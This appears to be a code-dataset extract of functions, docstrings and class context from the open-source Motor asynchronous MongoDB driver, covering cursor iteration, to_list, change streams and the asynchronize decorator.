self._get_more(),
self._to_list, length, the_list, future)
return future
def _to_list(self, length, the_list, future, get_more_result):
# get_more_result is the result of self._get_more().
# to_list_future will be the result of the user's to_list() call.
try:
result = get_more_result.result()
collection = self.collection
fix_outgoing = collection.database.delegate._fix_outgoing
if length is None:
n = result
else:
n = min(length, result)
for _ in range(n):
the_list.append(fix_outgoing(self._data().popleft(),
collection))
reached_length = (length is not None and len(the_list) >= length)
if reached_length or not self.alive:
future.set_result(the_list)
else:
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
except Exception as exc:
future.set_exception(exc)
def get_io_loop(self):
return self.collection.get_io_loop()
@motor_coroutine
def close(self):
"""Explicitly kill this cursor on the server. Call like (in Tornado):
.. code-block:: python
yield cursor.close()
"""
if not self.closed:
self.closed = True
yield self._framework.yieldable(self._close())
def batch_size(self, batch_size):
self.delegate.batch_size(batch_size)
return self
def _buffer_size(self):
return len(self._data())
# Paper over some differences between PyMongo Cursor and CommandCursor.
def _query_flags(self):
raise NotImplementedError
def _data(self):
raise NotImplementedError
def _clear_cursor_id(self):
raise NotImplementedError
def _close_exhaust_cursor(self):
raise NotImplementedError
def _killed(self):
raise NotImplementedError
@motor_coroutine
def _close(self):
raise NotImplementedError()
|
mongodb/motor | motor/core.py | AgnosticBaseCursor.fetch_next | python | def fetch_next(self):
if not self._buffer_size() and self.alive:
# Return the Future, which resolves to number of docs fetched or 0.
return self._get_more()
elif self._buffer_size():
future = self._framework.get_future(self.get_io_loop())
future.set_result(True)
return future
else:
# Dead
future = self._framework.get_future(self.get_io_loop())
future.set_result(False)
return future | A Future used with `gen.coroutine`_ to asynchronously retrieve the
next document in the result set, fetching a batch of documents from the
server if necessary. Resolves to ``False`` if there are no more
documents, otherwise :meth:`next_object` is guaranteed to return a
document.
.. _`gen.coroutine`: http://tornadoweb.org/en/stable/gen.html
.. doctest:: fetch_next
:hide:
>>> _ = MongoClient().test.test_collection.delete_many({})
>>> collection = MotorClient().test.test_collection
.. doctest:: fetch_next
>>> @gen.coroutine
... def f():
... yield collection.insert_many([{'_id': i} for i in range(5)])
... cursor = collection.find().sort([('_id', 1)])
... while (yield cursor.fetch_next):
... doc = cursor.next_object()
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
While it appears that fetch_next retrieves each document from
the server individually, the cursor actually fetches documents
efficiently in `large batches`_.
In Python 3.5 and newer, cursors can be iterated elegantly and very
efficiently in native coroutines with `async for`:
.. doctest:: fetch_next
>>> async def f():
... async for doc in collection.find():
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
.. _`large batches`: https://docs.mongodb.com/manual/tutorial/iterate-a-cursor/#cursor-batches | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L912-L971 | [
"def _buffer_size(self):\n return len(self._data())\n"
] | class AgnosticBaseCursor(AgnosticBase):
"""Base class for AgnosticCursor and AgnosticCommandCursor"""
_refresh = AsyncRead()
address = ReadOnlyProperty()
cursor_id = ReadOnlyProperty()
alive = ReadOnlyProperty()
session = ReadOnlyProperty()
def __init__(self, cursor, collection):
"""Don't construct a cursor yourself, but acquire one from methods like
:meth:`MotorCollection.find` or :meth:`MotorCollection.aggregate`.
.. note::
There is no need to manually close cursors; they are closed
by the server after being fully iterated
with :meth:`to_list`, :meth:`each`, or :attr:`fetch_next`, or
automatically closed by the client when the :class:`MotorCursor` is
cleaned up by the garbage collector.
"""
# 'cursor' is a PyMongo Cursor, CommandCursor, or a _LatentCursor.
super(AgnosticBaseCursor, self).__init__(delegate=cursor)
self.collection = collection
self.started = False
self.closed = False
# python.org/dev/peps/pep-0492/#api-design-and-implementation-revisions
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
async def __anext__(self):
# An optimization: skip the "await" if possible.
if self._buffer_size() or await self.fetch_next:
return self.next_object()
raise StopAsyncIteration()
"""), globals(), locals())
def _get_more(self):
"""Initial query or getMore. Returns a Future."""
if not self.alive:
raise pymongo.errors.InvalidOperation(
"Can't call get_more() on a MotorCursor that has been"
" exhausted or killed.")
self.started = True
return self._refresh()
@property
@coroutine_annotation
def next_object(self):
"""Get a document from the most recently fetched batch, or ``None``.
See :attr:`fetch_next`.
"""
if not self._buffer_size():
return None
return next(self.delegate)
def each(self, callback):
"""Iterates over all the documents for this cursor.
:meth:`each` returns immediately, and `callback` is executed asynchronously
for each document. `callback` is passed ``(None, None)`` when iteration
is complete.
Cancel iteration early by returning ``False`` from the callback. (Only
``False`` cancels iteration: returning ``None`` or 0 does not.)
.. testsetup:: each
from tornado.ioloop import IOLoop
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many(
[{'_id': i} for i in range(5)])
collection = MotorClient().test.test_collection
.. doctest:: each
>>> def each(result, error):
... if error:
... raise error
... elif result:
... sys.stdout.write(str(result['_id']) + ', ')
... else:
... # Iteration complete
... IOLoop.current().stop()
... print('done')
...
>>> cursor = collection.find().sort([('_id', 1)])
>>> cursor.each(callback=each)
>>> IOLoop.current().start()
0, 1, 2, 3, 4, done
.. note:: Unlike other Motor methods, ``each`` requires a callback and
does not return a Future, so it cannot be used in a coroutine.
``async for``, :meth:`to_list`, :attr:`fetch_next` are much easier to
use.
:Parameters:
- `callback`: function taking (document, error)
"""
if not callable(callback):
raise callback_type_error
self._each_got_more(callback, None)
def _each_got_more(self, callback, future):
if future:
try:
future.result()
except Exception as error:
callback(None, error)
return
while self._buffer_size() > 0:
doc = next(self.delegate) # decrements self.buffer_size
# Quit if callback returns exactly False (not None). Note we
# don't close the cursor: user may want to resume iteration.
if callback(doc, None) is False:
return
# The callback closed this cursor?
if self.closed:
return
if self.alive and (self.cursor_id or not self.started):
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._each_got_more, callback)
else:
# Complete
self._framework.call_soon(
self.get_io_loop(),
functools.partial(callback, None, None))
@coroutine_annotation
def to_list(self, length):
"""Get a list of documents.
.. testsetup:: to_list
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many([{'_id': i} for i in range(4)])
from tornado import ioloop
.. doctest:: to_list
>>> from motor.motor_tornado import MotorClient
>>> collection = MotorClient().test.test_collection
>>>
>>> @gen.coroutine
... def f():
... cursor = collection.find().sort([('_id', 1)])
... docs = yield cursor.to_list(length=2)
... while docs:
... print(docs)
... docs = yield cursor.to_list(length=2)
...
... print('done')
...
>>> ioloop.IOLoop.current().run_sync(f)
[{'_id': 0}, {'_id': 1}]
[{'_id': 2}, {'_id': 3}]
done
:Parameters:
- `length`: maximum number of documents to return for this call, or
None
Returns a Future.
.. versionchanged:: 2.0
No longer accepts a callback argument.
.. versionchanged:: 0.2
`callback` must be passed as a keyword argument, like
``to_list(10, callback=callback)``, and the
`length` parameter is no longer optional.
"""
if length is not None:
if not isinstance(length, int):
raise TypeError('length must be an int, not %r' % length)
elif length < 0:
raise ValueError('length must be non-negative')
if self._query_flags() & _QUERY_OPTIONS['tailable_cursor']:
raise pymongo.errors.InvalidOperation(
"Can't call to_list on tailable cursor")
future = self._framework.get_future(self.get_io_loop())
if not self.alive:
future.set_result([])
else:
the_list = []
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
return future
def _to_list(self, length, the_list, future, get_more_result):
# get_more_result is the result of self._get_more().
# to_list_future will be the result of the user's to_list() call.
try:
result = get_more_result.result()
collection = self.collection
fix_outgoing = collection.database.delegate._fix_outgoing
if length is None:
n = result
else:
n = min(length, result)
for _ in range(n):
the_list.append(fix_outgoing(self._data().popleft(),
collection))
reached_length = (length is not None and len(the_list) >= length)
if reached_length or not self.alive:
future.set_result(the_list)
else:
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
except Exception as exc:
future.set_exception(exc)
def get_io_loop(self):
return self.collection.get_io_loop()
@motor_coroutine
def close(self):
"""Explicitly kill this cursor on the server. Call like (in Tornado):
.. code-block:: python
yield cursor.close()
"""
if not self.closed:
self.closed = True
yield self._framework.yieldable(self._close())
def batch_size(self, batch_size):
self.delegate.batch_size(batch_size)
return self
def _buffer_size(self):
return len(self._data())
# Paper over some differences between PyMongo Cursor and CommandCursor.
def _query_flags(self):
raise NotImplementedError
def _data(self):
raise NotImplementedError
def _clear_cursor_id(self):
raise NotImplementedError
def _close_exhaust_cursor(self):
raise NotImplementedError
def _killed(self):
raise NotImplementedError
@motor_coroutine
def _close(self):
raise NotImplementedError()
|
mongodb/motor | motor/core.py | AgnosticBaseCursor.to_list | python | def to_list(self, length):
if length is not None:
if not isinstance(length, int):
raise TypeError('length must be an int, not %r' % length)
elif length < 0:
raise ValueError('length must be non-negative')
if self._query_flags() & _QUERY_OPTIONS['tailable_cursor']:
raise pymongo.errors.InvalidOperation(
"Can't call to_list on tailable cursor")
future = self._framework.get_future(self.get_io_loop())
if not self.alive:
future.set_result([])
else:
the_list = []
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
return future | Get a list of documents.
.. testsetup:: to_list
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many([{'_id': i} for i in range(4)])
from tornado import ioloop
.. doctest:: to_list
>>> from motor.motor_tornado import MotorClient
>>> collection = MotorClient().test.test_collection
>>>
>>> @gen.coroutine
... def f():
... cursor = collection.find().sort([('_id', 1)])
... docs = yield cursor.to_list(length=2)
... while docs:
... print(docs)
... docs = yield cursor.to_list(length=2)
...
... print('done')
...
>>> ioloop.IOLoop.current().run_sync(f)
[{'_id': 0}, {'_id': 1}]
[{'_id': 2}, {'_id': 3}]
done
:Parameters:
- `length`: maximum number of documents to return for this call, or
None
Returns a Future.
.. versionchanged:: 2.0
No longer accepts a callback argument.
.. versionchanged:: 0.2
`callback` must be passed as a keyword argument, like
``to_list(10, callback=callback)``, and the
`length` parameter is no longer optional. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L1062-L1127 | [
"def _query_flags(self):\n raise NotImplementedError\n"
] | class AgnosticBaseCursor(AgnosticBase):
"""Base class for AgnosticCursor and AgnosticCommandCursor"""
_refresh = AsyncRead()
address = ReadOnlyProperty()
cursor_id = ReadOnlyProperty()
alive = ReadOnlyProperty()
session = ReadOnlyProperty()
def __init__(self, cursor, collection):
"""Don't construct a cursor yourself, but acquire one from methods like
:meth:`MotorCollection.find` or :meth:`MotorCollection.aggregate`.
.. note::
There is no need to manually close cursors; they are closed
by the server after being fully iterated
with :meth:`to_list`, :meth:`each`, or :attr:`fetch_next`, or
automatically closed by the client when the :class:`MotorCursor` is
cleaned up by the garbage collector.
"""
# 'cursor' is a PyMongo Cursor, CommandCursor, or a _LatentCursor.
super(AgnosticBaseCursor, self).__init__(delegate=cursor)
self.collection = collection
self.started = False
self.closed = False
# python.org/dev/peps/pep-0492/#api-design-and-implementation-revisions
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
async def __anext__(self):
# An optimization: skip the "await" if possible.
if self._buffer_size() or await self.fetch_next:
return self.next_object()
raise StopAsyncIteration()
"""), globals(), locals())
def _get_more(self):
"""Initial query or getMore. Returns a Future."""
if not self.alive:
raise pymongo.errors.InvalidOperation(
"Can't call get_more() on a MotorCursor that has been"
" exhausted or killed.")
self.started = True
return self._refresh()
@property
@coroutine_annotation
def fetch_next(self):
"""A Future used with `gen.coroutine`_ to asynchronously retrieve the
next document in the result set, fetching a batch of documents from the
server if necessary. Resolves to ``False`` if there are no more
documents, otherwise :meth:`next_object` is guaranteed to return a
document.
.. _`gen.coroutine`: http://tornadoweb.org/en/stable/gen.html
.. doctest:: fetch_next
:hide:
>>> _ = MongoClient().test.test_collection.delete_many({})
>>> collection = MotorClient().test.test_collection
.. doctest:: fetch_next
>>> @gen.coroutine
... def f():
... yield collection.insert_many([{'_id': i} for i in range(5)])
... cursor = collection.find().sort([('_id', 1)])
... while (yield cursor.fetch_next):
... doc = cursor.next_object()
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
While it appears that fetch_next retrieves each document from
the server individually, the cursor actually fetches documents
efficiently in `large batches`_.
In Python 3.5 and newer, cursors can be iterated elegantly and very
efficiently in native coroutines with `async for`:
.. doctest:: fetch_next
>>> async def f():
... async for doc in collection.find():
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
.. _`large batches`: https://docs.mongodb.com/manual/tutorial/iterate-a-cursor/#cursor-batches
"""
if not self._buffer_size() and self.alive:
# Return the Future, which resolves to number of docs fetched or 0.
return self._get_more()
elif self._buffer_size():
future = self._framework.get_future(self.get_io_loop())
future.set_result(True)
return future
else:
# Dead
future = self._framework.get_future(self.get_io_loop())
future.set_result(False)
return future
def next_object(self):
"""Get a document from the most recently fetched batch, or ``None``.
See :attr:`fetch_next`.
"""
if not self._buffer_size():
return None
return next(self.delegate)
def each(self, callback):
"""Iterates over all the documents for this cursor.
:meth:`each` returns immediately, and `callback` is executed asynchronously
for each document. `callback` is passed ``(None, None)`` when iteration
is complete.
Cancel iteration early by returning ``False`` from the callback. (Only
``False`` cancels iteration: returning ``None`` or 0 does not.)
.. testsetup:: each
from tornado.ioloop import IOLoop
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many(
[{'_id': i} for i in range(5)])
collection = MotorClient().test.test_collection
.. doctest:: each
>>> def each(result, error):
... if error:
... raise error
... elif result:
... sys.stdout.write(str(result['_id']) + ', ')
... else:
... # Iteration complete
... IOLoop.current().stop()
... print('done')
...
>>> cursor = collection.find().sort([('_id', 1)])
>>> cursor.each(callback=each)
>>> IOLoop.current().start()
0, 1, 2, 3, 4, done
.. note:: Unlike other Motor methods, ``each`` requires a callback and
does not return a Future, so it cannot be used in a coroutine.
``async for``, :meth:`to_list`, :attr:`fetch_next` are much easier to
use.
:Parameters:
- `callback`: function taking (document, error)
"""
if not callable(callback):
raise callback_type_error
self._each_got_more(callback, None)
def _each_got_more(self, callback, future):
if future:
try:
future.result()
except Exception as error:
callback(None, error)
return
while self._buffer_size() > 0:
doc = next(self.delegate) # decrements self.buffer_size
# Quit if callback returns exactly False (not None). Note we
# don't close the cursor: user may want to resume iteration.
if callback(doc, None) is False:
return
# The callback closed this cursor?
if self.closed:
return
if self.alive and (self.cursor_id or not self.started):
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._each_got_more, callback)
else:
# Complete
self._framework.call_soon(
self.get_io_loop(),
functools.partial(callback, None, None))
@coroutine_annotation
def _to_list(self, length, the_list, future, get_more_result):
# get_more_result is the result of self._get_more().
# to_list_future will be the result of the user's to_list() call.
try:
result = get_more_result.result()
collection = self.collection
fix_outgoing = collection.database.delegate._fix_outgoing
if length is None:
n = result
else:
n = min(length, result)
for _ in range(n):
the_list.append(fix_outgoing(self._data().popleft(),
collection))
reached_length = (length is not None and len(the_list) >= length)
if reached_length or not self.alive:
future.set_result(the_list)
else:
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
except Exception as exc:
future.set_exception(exc)
def get_io_loop(self):
return self.collection.get_io_loop()
@motor_coroutine
def close(self):
"""Explicitly kill this cursor on the server. Call like (in Tornado):
.. code-block:: python
yield cursor.close()
"""
if not self.closed:
self.closed = True
yield self._framework.yieldable(self._close())
def batch_size(self, batch_size):
self.delegate.batch_size(batch_size)
return self
def _buffer_size(self):
return len(self._data())
# Paper over some differences between PyMongo Cursor and CommandCursor.
def _query_flags(self):
raise NotImplementedError
def _data(self):
raise NotImplementedError
def _clear_cursor_id(self):
raise NotImplementedError
def _close_exhaust_cursor(self):
raise NotImplementedError
def _killed(self):
raise NotImplementedError
@motor_coroutine
def _close(self):
raise NotImplementedError()
|
mongodb/motor | motor/core.py | AgnosticBaseCursor.close | python | def close(self):
if not self.closed:
self.closed = True
yield self._framework.yieldable(self._close()) | Explicitly kill this cursor on the server. Call like (in Tornado):
.. code-block:: python
yield cursor.close() | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L1161-L1170 | [
"def _close(self):\n raise NotImplementedError()\n"
] | class AgnosticBaseCursor(AgnosticBase):
"""Base class for AgnosticCursor and AgnosticCommandCursor"""
_refresh = AsyncRead()
address = ReadOnlyProperty()
cursor_id = ReadOnlyProperty()
alive = ReadOnlyProperty()
session = ReadOnlyProperty()
def __init__(self, cursor, collection):
"""Don't construct a cursor yourself, but acquire one from methods like
:meth:`MotorCollection.find` or :meth:`MotorCollection.aggregate`.
.. note::
There is no need to manually close cursors; they are closed
by the server after being fully iterated
with :meth:`to_list`, :meth:`each`, or :attr:`fetch_next`, or
automatically closed by the client when the :class:`MotorCursor` is
cleaned up by the garbage collector.
"""
# 'cursor' is a PyMongo Cursor, CommandCursor, or a _LatentCursor.
super(AgnosticBaseCursor, self).__init__(delegate=cursor)
self.collection = collection
self.started = False
self.closed = False
# python.org/dev/peps/pep-0492/#api-design-and-implementation-revisions
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
async def __anext__(self):
# An optimization: skip the "await" if possible.
if self._buffer_size() or await self.fetch_next:
return self.next_object()
raise StopAsyncIteration()
"""), globals(), locals())
def _get_more(self):
"""Initial query or getMore. Returns a Future."""
if not self.alive:
raise pymongo.errors.InvalidOperation(
"Can't call get_more() on a MotorCursor that has been"
" exhausted or killed.")
self.started = True
return self._refresh()
@property
@coroutine_annotation
def fetch_next(self):
"""A Future used with `gen.coroutine`_ to asynchronously retrieve the
next document in the result set, fetching a batch of documents from the
server if necessary. Resolves to ``False`` if there are no more
documents, otherwise :meth:`next_object` is guaranteed to return a
document.
.. _`gen.coroutine`: http://tornadoweb.org/en/stable/gen.html
.. doctest:: fetch_next
:hide:
>>> _ = MongoClient().test.test_collection.delete_many({})
>>> collection = MotorClient().test.test_collection
.. doctest:: fetch_next
>>> @gen.coroutine
... def f():
... yield collection.insert_many([{'_id': i} for i in range(5)])
... cursor = collection.find().sort([('_id', 1)])
... while (yield cursor.fetch_next):
... doc = cursor.next_object()
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
While it appears that fetch_next retrieves each document from
the server individually, the cursor actually fetches documents
efficiently in `large batches`_.
In Python 3.5 and newer, cursors can be iterated elegantly and very
efficiently in native coroutines with `async for`:
.. doctest:: fetch_next
>>> async def f():
... async for doc in collection.find():
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
.. _`large batches`: https://docs.mongodb.com/manual/tutorial/iterate-a-cursor/#cursor-batches
"""
if not self._buffer_size() and self.alive:
# Return the Future, which resolves to number of docs fetched or 0.
return self._get_more()
elif self._buffer_size():
future = self._framework.get_future(self.get_io_loop())
future.set_result(True)
return future
else:
# Dead
future = self._framework.get_future(self.get_io_loop())
future.set_result(False)
return future
def next_object(self):
"""Get a document from the most recently fetched batch, or ``None``.
See :attr:`fetch_next`.
"""
if not self._buffer_size():
return None
return next(self.delegate)
def each(self, callback):
"""Iterates over all the documents for this cursor.
:meth:`each` returns immediately, and `callback` is executed asynchronously
for each document. `callback` is passed ``(None, None)`` when iteration
is complete.
Cancel iteration early by returning ``False`` from the callback. (Only
``False`` cancels iteration: returning ``None`` or 0 does not.)
.. testsetup:: each
from tornado.ioloop import IOLoop
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many(
[{'_id': i} for i in range(5)])
collection = MotorClient().test.test_collection
.. doctest:: each
>>> def each(result, error):
... if error:
... raise error
... elif result:
... sys.stdout.write(str(result['_id']) + ', ')
... else:
... # Iteration complete
... IOLoop.current().stop()
... print('done')
...
>>> cursor = collection.find().sort([('_id', 1)])
>>> cursor.each(callback=each)
>>> IOLoop.current().start()
0, 1, 2, 3, 4, done
.. note:: Unlike other Motor methods, ``each`` requires a callback and
does not return a Future, so it cannot be used in a coroutine.
``async for``, :meth:`to_list`, :attr:`fetch_next` are much easier to
use.
:Parameters:
- `callback`: function taking (document, error)
"""
if not callable(callback):
raise callback_type_error
self._each_got_more(callback, None)
def _each_got_more(self, callback, future):
if future:
try:
future.result()
except Exception as error:
callback(None, error)
return
while self._buffer_size() > 0:
doc = next(self.delegate) # decrements self.buffer_size
# Quit if callback returns exactly False (not None). Note we
# don't close the cursor: user may want to resume iteration.
if callback(doc, None) is False:
return
# The callback closed this cursor?
if self.closed:
return
if self.alive and (self.cursor_id or not self.started):
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._each_got_more, callback)
else:
# Complete
self._framework.call_soon(
self.get_io_loop(),
functools.partial(callback, None, None))
@coroutine_annotation
def to_list(self, length):
"""Get a list of documents.
.. testsetup:: to_list
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many([{'_id': i} for i in range(4)])
from tornado import ioloop
.. doctest:: to_list
>>> from motor.motor_tornado import MotorClient
>>> collection = MotorClient().test.test_collection
>>>
>>> @gen.coroutine
... def f():
... cursor = collection.find().sort([('_id', 1)])
... docs = yield cursor.to_list(length=2)
... while docs:
... print(docs)
... docs = yield cursor.to_list(length=2)
...
... print('done')
...
>>> ioloop.IOLoop.current().run_sync(f)
[{'_id': 0}, {'_id': 1}]
[{'_id': 2}, {'_id': 3}]
done
:Parameters:
- `length`: maximum number of documents to return for this call, or
None
Returns a Future.
.. versionchanged:: 2.0
No longer accepts a callback argument.
.. versionchanged:: 0.2
`callback` must be passed as a keyword argument, like
``to_list(10, callback=callback)``, and the
`length` parameter is no longer optional.
"""
if length is not None:
if not isinstance(length, int):
raise TypeError('length must be an int, not %r' % length)
elif length < 0:
raise ValueError('length must be non-negative')
if self._query_flags() & _QUERY_OPTIONS['tailable_cursor']:
raise pymongo.errors.InvalidOperation(
"Can't call to_list on tailable cursor")
future = self._framework.get_future(self.get_io_loop())
if not self.alive:
future.set_result([])
else:
the_list = []
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
return future
def _to_list(self, length, the_list, future, get_more_result):
# get_more_result is the result of self._get_more().
# to_list_future will be the result of the user's to_list() call.
try:
result = get_more_result.result()
collection = self.collection
fix_outgoing = collection.database.delegate._fix_outgoing
if length is None:
n = result
else:
n = min(length, result)
for _ in range(n):
the_list.append(fix_outgoing(self._data().popleft(),
collection))
reached_length = (length is not None and len(the_list) >= length)
if reached_length or not self.alive:
future.set_result(the_list)
else:
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
except Exception as exc:
future.set_exception(exc)
def get_io_loop(self):
return self.collection.get_io_loop()
@motor_coroutine
def batch_size(self, batch_size):
self.delegate.batch_size(batch_size)
return self
def _buffer_size(self):
return len(self._data())
# Paper over some differences between PyMongo Cursor and CommandCursor.
def _query_flags(self):
raise NotImplementedError
def _data(self):
raise NotImplementedError
def _clear_cursor_id(self):
raise NotImplementedError
def _close_exhaust_cursor(self):
raise NotImplementedError
def _killed(self):
raise NotImplementedError
@motor_coroutine
def _close(self):
raise NotImplementedError()
|
mongodb/motor | motor/core.py | AgnosticChangeStream.next | python | def next(self):
loop = self.get_io_loop()
return self._framework.run_on_executor(loop, self._next) | Advance the cursor.
This method blocks until the next change document is returned or an
unrecoverable error is raised.
Raises :exc:`StopAsyncIteration` if this change stream is closed.
You can iterate the change stream by calling
``await change_stream.next()`` repeatedly, or with an "async for" loop:
.. code-block:: python3
async for change in db.collection.watch():
print(change) | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L1419-L1437 | [
"def get_io_loop(self):\n return self._target.get_io_loop()\n"
] | class AgnosticChangeStream(AgnosticBase):
"""A change stream cursor.
Should not be called directly by application developers. See
:meth:`~MotorCollection.watch` for example usage.
.. versionadded: 1.2
.. mongodoc:: changeStreams
"""
__delegate_class__ = ChangeStream
__motor_class_name__ = 'MotorChangeStream'
_close = AsyncCommand(attr_name='close')
def __init__(self, target, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session):
super(self.__class__, self).__init__(delegate=None)
# The "target" object is a client, database, or collection.
self._target = target
self._kwargs = {'pipeline': pipeline,
'full_document': full_document,
'resume_after': resume_after,
'max_await_time_ms': max_await_time_ms,
'batch_size': batch_size,
'collation': collation,
'start_at_operation_time': start_at_operation_time,
'session': session}
def _next(self):
# This method is run on a thread.
try:
if not self.delegate:
self.delegate = self._target.delegate.watch(**self._kwargs)
return self.delegate.next()
except StopIteration:
raise StopAsyncIteration()
@coroutine_annotation
@coroutine_annotation
def close(self):
"""Close this change stream.
Stops any "async for" loops using this change stream.
"""
if self.delegate:
return self._close()
# Never started.
future = self._framework.get_future(self.get_io_loop())
future.set_result(None)
return future
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
__anext__ = next
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
if self.delegate:
self.delegate.close()
"""), globals(), locals())
def get_io_loop(self):
return self._target.get_io_loop()
def __enter__(self):
raise RuntimeError('Use a change stream in "async with", not "with"')
def __exit__(self, exc_type, exc_val, exc_tb):
pass
|
mongodb/motor | motor/core.py | AgnosticChangeStream.close | python | def close(self):
if self.delegate:
return self._close()
# Never started.
future = self._framework.get_future(self.get_io_loop())
future.set_result(None)
return future | Close this change stream.
Stops any "async for" loops using this change stream. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L1440-L1451 | [
"def get_io_loop(self):\n return self._target.get_io_loop()\n"
] | class AgnosticChangeStream(AgnosticBase):
"""A change stream cursor.
Should not be called directly by application developers. See
:meth:`~MotorCollection.watch` for example usage.
.. versionadded: 1.2
.. mongodoc:: changeStreams
"""
__delegate_class__ = ChangeStream
__motor_class_name__ = 'MotorChangeStream'
_close = AsyncCommand(attr_name='close')
def __init__(self, target, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session):
super(self.__class__, self).__init__(delegate=None)
# The "target" object is a client, database, or collection.
self._target = target
self._kwargs = {'pipeline': pipeline,
'full_document': full_document,
'resume_after': resume_after,
'max_await_time_ms': max_await_time_ms,
'batch_size': batch_size,
'collation': collation,
'start_at_operation_time': start_at_operation_time,
'session': session}
def _next(self):
# This method is run on a thread.
try:
if not self.delegate:
self.delegate = self._target.delegate.watch(**self._kwargs)
return self.delegate.next()
except StopIteration:
raise StopAsyncIteration()
@coroutine_annotation
def next(self):
"""Advance the cursor.
This method blocks until the next change document is returned or an
unrecoverable error is raised.
Raises :exc:`StopAsyncIteration` if this change stream is closed.
You can iterate the change stream by calling
``await change_stream.next()`` repeatedly, or with an "async for" loop:
.. code-block:: python3
async for change in db.collection.watch():
print(change)
"""
loop = self.get_io_loop()
return self._framework.run_on_executor(loop, self._next)
@coroutine_annotation
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
__anext__ = next
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
if self.delegate:
self.delegate.close()
"""), globals(), locals())
def get_io_loop(self):
return self._target.get_io_loop()
def __enter__(self):
raise RuntimeError('Use a change stream in "async with", not "with"')
def __exit__(self, exc_type, exc_val, exc_tb):
pass
|
mongodb/motor | motor/metaprogramming.py | asynchronize | python | def asynchronize(
framework, sync_method, doc=None, wrap_class=None, unwrap_class=None):
@functools.wraps(sync_method)
def method(self, *args, **kwargs):
if unwrap_class is not None:
# Don't call isinstance(), not checking subclasses.
unwrapped_args = [
obj.delegate
if obj.__class__.__name__.endswith(
(unwrap_class, 'MotorClientSession'))
else obj
for obj in args]
unwrapped_kwargs = {
key: (obj.delegate
if obj.__class__.__name__.endswith(
(unwrap_class, 'MotorClientSession'))
else obj)
for key, obj in kwargs.items()}
else:
# For speed, don't call unwrap_args_session/unwrap_kwargs_session.
unwrapped_args = [
obj.delegate
if obj.__class__.__name__.endswith('MotorClientSession')
else obj
for obj in args]
unwrapped_kwargs = {
key: (obj.delegate
if obj.__class__.__name__.endswith('MotorClientSession')
else obj)
for key, obj in kwargs.items()}
loop = self.get_io_loop()
return framework.run_on_executor(loop,
sync_method,
self.delegate,
*unwrapped_args,
**unwrapped_kwargs)
if wrap_class is not None:
method = framework.pymongo_class_wrapper(method, wrap_class)
method.is_wrap_method = True # For Synchro.
# This is for the benefit of motor_extensions.py, which needs this info to
# generate documentation with Sphinx.
method.is_async_method = True
name = sync_method.__name__
method.pymongo_method_name = name
if doc is not None:
method.__doc__ = doc
return method | Decorate `sync_method` so it returns a Future.
The method runs on a thread and resolves the Future when it completes.
:Parameters:
- `motor_class`: Motor class being created, e.g. MotorClient.
- `framework`: An asynchronous framework
- `sync_method`: Unbound method of pymongo Collection, Database,
MongoClient, etc.
- `doc`: Optionally override sync_method's docstring
- `wrap_class`: Optional PyMongo class, wrap a returned object of
this PyMongo class in the equivalent Motor class
- `unwrap_class` Optional Motor class name, unwrap an argument with
this Motor class name and pass the wrapped PyMongo
object instead | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/metaprogramming.py#L27-L94 | null | # Copyright 2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
